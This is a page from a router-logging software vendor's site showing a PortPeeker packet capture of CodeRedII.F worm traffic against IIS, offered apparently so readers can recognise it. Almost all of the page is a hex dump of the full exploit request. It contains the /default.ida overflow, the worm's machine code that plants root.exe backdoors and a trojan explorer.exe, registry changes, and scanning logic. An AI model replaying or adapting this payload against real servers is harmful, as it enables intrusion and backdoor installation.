Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

Code RedII.f
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

Common ScansScans

ResourcesResources

PortPeekerPortPeeker

PortPeeker Capture of CodeRedII Traffic

Code RedII.F description on F-Secure

TCP Port 80 (note packet sizes can be different depending on network configuration of infected system)

Targets unpatched IIS Servers

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:28.289
0000 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
0010 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
0020 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0030 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0040 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0050 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0060 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0070 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0080 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0090 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00A0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00B0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00C0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00D0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00E0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
00F0 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc
0100 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
0110 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
0120 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
0130 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
0140 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
0150 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
0160 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
0170 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
0180 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
0190 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co
01A0 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33
01B0 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`....
01C0 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&..
01D0 E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\...
01E0 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@
01F0 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=...
0200 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=...........
0210 C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0...
0220 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0......
0230 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$
0240 FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P
0250 FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P
0260 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p....
0270 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U.
0280 FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,...
0290 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,.............
02A0 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u.....
02B0 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U
02C0 D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T....
02D0 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j
02E0 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E
02F0 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U.
0300 0F B7 85 3C FE FF FF 3D 88 88 00 00 73 CF 0F B7 ...<...=....s...
0310 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p..
0320 FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d..
0330 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U.
0340 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f..
0350 FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P
0360 FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3
0370 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h..
0380 FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........
0390 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d.
03A0 FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`..
03B0 FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f
03C0 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1..
03D0 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h....
03E0 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j.
03F0 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U..
0400 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w.
0410 C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu....
0420 F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg..
0430 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.&
0440 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P
0450 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..<
0460 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u
0470 BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G
0480 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu..
0490 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........
04A0 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg...
04B0 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E..
04C0 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA
04D0 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C
04E0 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u..
04F0 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic
0500 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E.
0510 E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U
0520 F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
0530 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID.
0540 FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge
0550 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory
0560 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E......
0570 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U.
0580 89 45 DC E8 10 00                               .E....

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:28.480
0000 00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D ..GlobalFindAtom
0010 41 00 FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 A..u..U..E......
0020 47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF GlobalAddAtomA..
0030 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F u..U..E......Clo
0040 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 seHandle..u..U..
0050 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF E......_lcreat..
0060 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 u..U..E......_lw
0070 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 rite..u..U..E...
0080 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 ..._lclose..u..U
0090 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
00A0 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 emTime..u..U..E.
00B0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 .....WS2_32.DLL.
00C0 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 .U..E......socke
00D0 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 t..u..U..E......
00E0 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF closesocket..u..
00F0 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 U..E......ioctls
0100 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 ocket..u..U..E..
0110 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF ....connect..u..
0120 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 U..E......select
0130 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 ..u..U..E......s
0140 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 end..u..U..E....
0150 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 ..recv..u..U..E.
0160 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 .....gethostname
0170 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 ..u..U..E......g
0180 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC ethostbyname..u.
0190 FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 .U..E......WSAGe
01A0 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 tLastError..u..U
01B0 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E ..E......USER32.
01C0 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 DLL..U..E......E
01D0 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 xitWindowsEx..u.
01E0 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 .U..E...E.i.....
01F0 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 @.E....xV4......
0200 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ......<.t.<.t...
0210 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 ................
0220 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 ................
0230 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 ....... ........
0240 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 ................
0250 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 ...........Y...#
0260 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F ...#.X.......t.
0270 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 ...t.;.X...t..h.
0280 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 .....\...P.U....
0290 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 \........\CMD.EX
02A0 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 E.^.....cj......
02B0 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 d:\inetpub\scrip
02C0 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 ts\root.exe...$.
02D0 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 ...\...P.U.j..+.
02E0 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F ..d:\progra~1\co
02F0 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 mmon~1\system\MS
0300 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 ADC\root.exe...$
0310 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 ....\...P.U.....
0320 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF ..MZP...........
0330 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 ..........@.....
0340 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 .........PE..L..
0350 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F ..*%)...........
0360 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 00 00 ................
0370 00 00 10 00 00 00 10 00 00 00 20 00 00 00 00 40 .......... ....@
0380 00 00 10 00 00 00 04 00 00 01 00 00 00 00 00 00 ................
0390 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 ..........@.....
03A0 00 00 00 00 00 02 00 00 00 00 00 10 00 00 20 00 .............. .
03B0 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 ................
03C0 00 00 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC ..........0.....
03D0 FC FC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ................
03F0 00 10 00 00 00 04 00 00 00 08 00 00 00 00 00 00 ................
0400 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 ........ ..`....
0410 00 00 00 00 00 10 00 00 00 20 00 00 00 04 00 00 ......... ......
0420 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0430 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 @...............
0440 00 30 00 00 00 04 00 00 00 10 00 00 00 00 00 00 .0..............
0450 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC ........@.......
0460 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0470 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0480 FC FC FC FC FC FC FC FC 00 00 00 00 00 00 00 00 ................
0490 00 00 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 ........h....h. 
04A0 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 @..a...... @... 
04B0 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 @.....j.h. @..L.
04C0 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 .......h.'...1..
04D0 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 ...h.$@.h?...j.h
04E0 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 . @.h.....2.....
04F0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 u&j.hT @.j.j.hH 
0500 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 @..5.$@.......5.
0510 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 $@......h.$@.h?.
0520 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED ..j.hX @.h......
0530 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 .....uU.. @..L..
0540 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 ... @..B...j.h. 
0550 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 @.j.j.h. @..5.$@
0560 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A ......j.h. @.j.j
0570 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 .h. @..5.$@.....
0580 00 FF 35 D8 24 40                               ..5.$@

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:29.050
0000 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 ..........$@....
0010 00 68 D0 24 40 00 68 D0 20 40 00 68 D4 24 40 00 .h.$@.h. @.h.$@.
0020 6A 00 55 FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 j.U.5.$@..`.....
0030 75 49 A1 D0 24 40 00 0B C0 74 40 BE D0 20 40 00 uI..$@...t@.. @.
0040 80 3E 00 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 .>.t6Ff.~.,,u...
0050 32 31 37 00 81 EE CC 20 40 00 89 35 D0 24 40 00 217.... @..5.$@.
0060 FF 35 D0 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 .5.$@.h. @.j.j.U
0070 FF 35 D8 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 .5.$@........%`0
0080 40 00 FF 25 64 30 40 00 FF 25 68 30 40 00 FF 25 @..%d0@..%h0@..%
0090 70 30 40 00 FF 25 74 30 40 00 FF 25 78 30 40 00 p0@..%t0@..%x0@.
00A0 FF 25 7C 30 40 FC FC FC FC FC FC FC FC FC FC FC .%|0@...........
00B0 FC FC FC FC FC FC FC FC 00 00 00 00 00 00 00 00 ................
00C0 00 00 00 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 .....\EXPLORER.E
00D0 58 45 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 XE...SOFTWARE\Mi
00E0 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 crosoft\Windows 
00F0 4E 54 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F NT\CurrentVersio
0100 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 n\Winlogon...SFC
0110 44 69 73 61 62 6C 65 00 00 9D FF FF FF 53 59 53 Disable......SYS
0120 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 TEM\CurrentContr
0130 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 57 olSet\Services\W
0140 33 53 56 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 3SVC\Parameters\
0150 56 69 72 74 75 61 6C 20 52 6F 6F 74 73 00 00 00 Virtual Roots...
0160 00 2F 53 63 72 69 70 74 73 00 00 00 00 2F 4D 53 ./Scripts..../MS
0170 41 44 43 00 00 2F 43 00 00 2F 44 00 00 63 3A 5C ADC../C../D..c:\
0180 2C 2C 32 31 37 00 00 00 00 64 3A 5C 2C 2C 32 31 ,,217....d:\,,21
0190 37 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 7...............
01A0 FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C 30 ..............<0
01C0 00 00 00 00 00 00 00 00 00 00 84 30 00 00 60 30 ...........0..`0
01D0 00 00 4C 30 00 00 00 00 00 00 00 00 00 00 91 30 ..L0...........0
01E0 00 00 70 30 00 00 00 00 00 00 00 00 00 00 00 00 ..p0............
01F0 00 00 00 00 00 00 00 00 00 00 9E 30 00 00 A6 30 ...........0...0
0200 00 00 BE 30 00 00 00 00 00 00 C8 30 00 00 DC 30 ...0.......0...0
0210 00 00 EE 30 00 00 FE 30 00 00 00 00 00 00 9E 30 ...0...0.......0
0220 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0
0230 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0....
0240 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 41 ..KERNEL32.dll.A
0250 44 56 41 50 49 33 32 2E 64 6C 6C 00 00 00 53 6C DVAPI32.dll...Sl
0260 65 65 70 00 00 00 47 65 74 57 69 6E 64 6F 77 73 eep...GetWindows
0270 44 69 72 65 63 74 6F 72 79 41 00 00 00 00 57 69 DirectoryA....Wi
0280 6E 45 78 65 63 00 00 00 52 65 67 51 75 65 72 79 nExec...RegQuery
0290 56 61 6C 75 65 45 78 41 00 00 00 00 52 65 67 53 ValueExA....RegS
02A0 65 74 56 61 6C 75 65 45 78 41 00 00 00 00 52 65 etValueExA....Re
02B0 67 4F 70 65 6E 4B 65 79 45 78 41 00 00 00 52 65 gOpenKeyExA...Re
02C0 67 43 6C 6F 73 65 4B 65 79 FC FC FC FC FC FC FC gCloseKey.......
02D0 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
02E0 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
02F0 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0300 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0310 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0320 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0330 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350 00 00 00 00 00 5E BF B9 05 00 00 6A 07 E8 10 00 .....^.....j....
0360 00 00 64 3A 5C 65 78 70 6C 6F 72 65 72 2E 65 78 ..d:\explorer.ex
0370 65 00 8B 04 24 88 18 FF 55 CC 83 F8 FF 74 4D 89 e...$...U....tM.
0380 85 4C FE FF FF AC 8A F8 38 3E 75 27 6A 20 E8 23 .L......8>u'j .#
0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03B0 00 00 00 6A 01 56 FF B5 4C FE FF FF FF 55 C8 46 ...j.V..L....U.F
03C0 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 FE C3 80 FB Ou...L....U.....
03D0 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 00 90       d..L....a.....

While PortPeeker is not an officially supported product if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com